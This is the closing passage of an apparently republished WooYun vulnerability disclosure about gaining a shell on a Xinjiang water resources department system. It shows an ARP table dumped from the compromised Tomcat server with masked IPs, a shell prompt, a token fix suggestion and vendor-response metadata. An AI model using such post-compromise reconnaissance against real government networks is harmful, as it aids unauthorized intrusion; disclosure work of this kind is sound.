**.**.**.** 00-50-56-88-37-b8 动态
**.**.**.** 00-50-56-92-7c-03 动态
**.**.**.** 00-50-56-88-37-be 动态
**.**.**.** 00-50-56-92-62-92 动态
**.**.**.** 00-0c-29-84-da-c6 动态
**.**.**.** 00-50-56-88-64-26 动态
**.**.**.** 00-50-56-88-37-b9 动态
**.**.**.** d4-3d-7e-0a-74-65 动态
**.**.**.** 00-50-56-92-61-96 动态
**.**.**.**0 00-0c-29-5f-6c-cb 动态
**.**.**.**2 00-0c-29-60-62-a3 动态
**.**.**.** 00-50-56-88-64-21 动态
**.**.**.** 00-50-56-88-37-b9 动态
**.**.**.** 00-46-4b-aa-0c-25 动态
**.**.**.** ff-ff-ff-ff-ff-ff 静态
**.**.**.** 01-00-5e-00-00-02 静态
**.**.**.**2 01-00-5e-00-00-16 静态
**.**.**.**51 01-00-5e-00-00-fb 静态
**.**.**.**52 01-00-5e-00-00-fc 静态
**.**.**.** 01-00-5e-19-d8-ab 静态
**.**.**.** 01-00-5e-2e-db-0e 静态
**.**.**.** 01-00-5e-39-49-6f 静态
**.**.**.** 01-00-5e-49-e1-74 静态
**.**.**.** 01-00-5e-5a-ce-79 静态
**.**.**.** 01-00-5e-12-3e-24 静态
**.**.**.** 01-00-5e-12-3e-24 静态
**.**.**.** 01-00-5e-18-50-de 静态
**.**.**.** 01-00-5e-28-18-79 静态
**.**.**.** 01-00-5e-43-37-3b 静态
**.**.**.** 01-00-5e-79-ab-af 静态
**.**.**.** 01-00-5e-16-2c-3a 静态
**.**.**.** 01-00-5e-24-d5-b4 静态
**.**.**.** 01-00-5e-51-09-08 静态
**.**.**.** 01-00-5e-58-7f-77 静态
**.**.**.** 01-00-5e-68-a0-b7 静态
**.**.**.** 01-00-5e-07-66-2a 静态
**.**.**.** 01-00-5e-19-5b-7d 静态
**.**.**.** 01-00-5e-1e-4c-31 静态
**.**.**.** 01-00-5e-2f-74-70 静态
**.**.**.** 01-00-5e-63-2b-78 静态
**.**.**.** 01-00-5e-70-f0-de 静态
**.**.**.** 01-00-5e-41-e5-72 静态
**.**.**.** 01-00-5e-51-78-b4 静态
**.**.**.** 01-00-5e-08-65-7b 静态
**.**.**.** 01-00-5e-1e-f5-b6 静态
**.**.**.** 01-00-5e-37-89-71 静态
**.**.**.** 01-00-5e-51-55-da 静态
**.**.**.** 01-00-5e-56-ee-7c 静态
**.**.**.** 01-00-5e-00-00-04 静态
**.**.**.** 01-00-5e-1a-9d-0e 静态
**.**.**.** 01-00-5e-41-09-df 静态
**.**.**.** 01-00-5e-6e-2d-3a 静态
**.**.**.** 01-00-5e-3c-36-3b 静态
**.**.**.** 01-00-5e-43-c9-b6 静态
**.**.**.** 01-00-5e-44-d3-74 静态
**.**.**.** 01-00-5e-4d-94-b7 静态
**.**.**.** 01-00-5e-50-f2-2a 静态
**.**.**.** 01-00-5e-78-97-1b 静态
**.**.**.** 01-00-5e-1a-e3-2a 静态
**.**.**.** 01-00-5e-25-37-3a 静态
**.**.**.** 01-00-5e-06-42-71 静态
**.**.**.** 01-00-5e-25-b2-3c 静态
**.**.**.** 01-00-5e-35-96-af 静态
**.**.**.** 01-00-5e-60-84-b6 静态
**.**.**.** 01-00-5e-6d-78-0e 静态
**.**.**.** 01-00-5e-0e-5d-7d 静态
**.**.**.** 01-00-5e-10-ad-dc 静态
**.**.**.** 01-00-5e-36-c3-73 静态
**.**.**.** 01-00-5e-49-f0-71 静态
**.**.**.** 01-00-5e-6c-76-6a 静态
**.**.**.** 01-00-5e-26-b6-6e 静态
**.**.**.** 01-00-5e-3c-8d-77 静态
**.**.**.** 01-00-5e-3e-2f-3a 静态
**.**.**.** 01-00-5e-45-20-78 静态
**.**.**.** 01-00-5e-0f-59-de 静态
**.**.**.** 01-00-5e-1f-61-71 静态
**.**.**.** 01-00-5e-6c-f5-71 静态
**.**.**.** 01-00-5e-31-dc-73 静态
**.**.**.** 01-00-5e-38-46-da 静态
**.**.**.** 01-00-5e-5a-24-6a 静态
**.**.**.** 01-00-5e-5e-c9-73 静态
**.**.**.** 01-00-5e-6a-33-3a 静态
**.**.**.** 01-00-5e-13-3f-71 静态
**.**.**.** 01-00-5e-3b-52-31 静态
**.**.**.** 01-00-5e-63-20-b6 静态
**.**.**.** 01-00-5e-1f-9e-7b 静态
**.**.**.** 01-00-5e-28-9f-73 静态
**.**.**.** 01-00-5e-33-16-24 静态
**.**.**.** 01-00-5e-36-e4-73 静态
**.**.**.** 01-00-5e-44-82-dd 静态
**.**.**.** 01-00-5e-60-50-01 静态
**.**.**.** 01-00-5e-67-55-01 静态
**.**.**.** 01-00-5e-67-e8-dd 静态
**.**.**.** 01-00-5e-31-40-de 静态
**.**.**.** 01-00-5e-36-ad-3b 静态
**.**.**.** 01-00-5e-4a-15-74 静态
**.**.**.** 01-00-5e-4c-dc-3a 静态
**.**.**.** 01-00-5e-52-70-70 静态
**.**.**.** 01-00-5e-5c-dc-0e 静态
**.**.**.** 01-00-5e-5d-42-b7 静态
**.**.**.** 01-00-5e-2f-b8-6e 静态
**.**.**.** 01-00-5e-4d-b1-6e 静态
**.**.**.** 01-00-5e-32-74-31 静态
**.**.**.** 01-00-5e-4e-cf-01 静态
**.**.**.** 01-00-5e-11-71-7c 静态
**.**.**.** 01-00-5e-25-46-75 静态
**.**.**.** 01-00-5e-36-c9-73 静态
**.**.**.** 01-00-5e-61-d4-3a 静态
**.**.**.** 01-00-5e-26-48-7d 静态
**.**.**.** 01-00-5e-31-cb-b7 静态
**.**.**.** 01-00-5e-39-d0-de 静态
**.**.**.** 01-00-5e-6a-42-7d 静态
**.**.**.** 01-00-5e-00-00-01 静态
**.**.**.** 01-00-5e-01-d9-0e 静态
**.**.**.** 01-00-5e-2d-8e-af 静态
**.**.**.** 01-00-5e-55-20-6a 静态
**.**.**.** 01-00-5e-02-ee-7c 静态
**.**.**.** 01-00-5e-2a-fb-76 静态
**.**.**.** 01-00-5e-50-d6-73 静态
**.**.**.** 01-00-5e-6d-e9-7a 静态
**.**.**.** 01-00-5e-1a-8e-b6 静态
**.**.**.** 01-00-5e-08-8d-77 静态
**.**.**.** 01-00-5e-2a-80-77 静态
**.**.**.** 01-00-5e-33-d2-73 静态
**.**.**.** 01-00-5e-79-b1-6e 静态
**.**.**.** 01-00-5e-05-05-05 静态
**.**.**.** 01-00-5e-20-5c-2a 静态
**.**.**.** 01-00-5e-47-4d-6f 静态
**.**.**.** 01-00-5e-64-18-74 静态
**.**.**.** 01-00-5e-15-e5-72 静态
**.**.**.** 01-00-5e-1e-1a-b7 静态
**.**.**.** 01-00-5e-24-e9-79 静态
**.**.**.** 01-00-5e-2c-a7-dc 静态
**.**.**.** 01-00-5e-3a-5c-7d 静态
**.**.**.** 01-00-5e-7f-02-02 静态
**.**.**.** 01-00-5e-7f-ff-fa 静态
**.**.**.** ff-ff-ff-ff-ff-ff 静态


D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\>

 

修复方案:

加强安全意识

版权声明:转载请注明来源 朱元璋@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-11 15:51

厂商回复:

漏洞重复,CNVD不在重复处置。

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度未收录『点击提交』

本文链接:新疆水利厅某系统getshell可入内网 - https://www.15qq.cn/wooyun/493.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

未显示?请点击刷新

允许邮件通知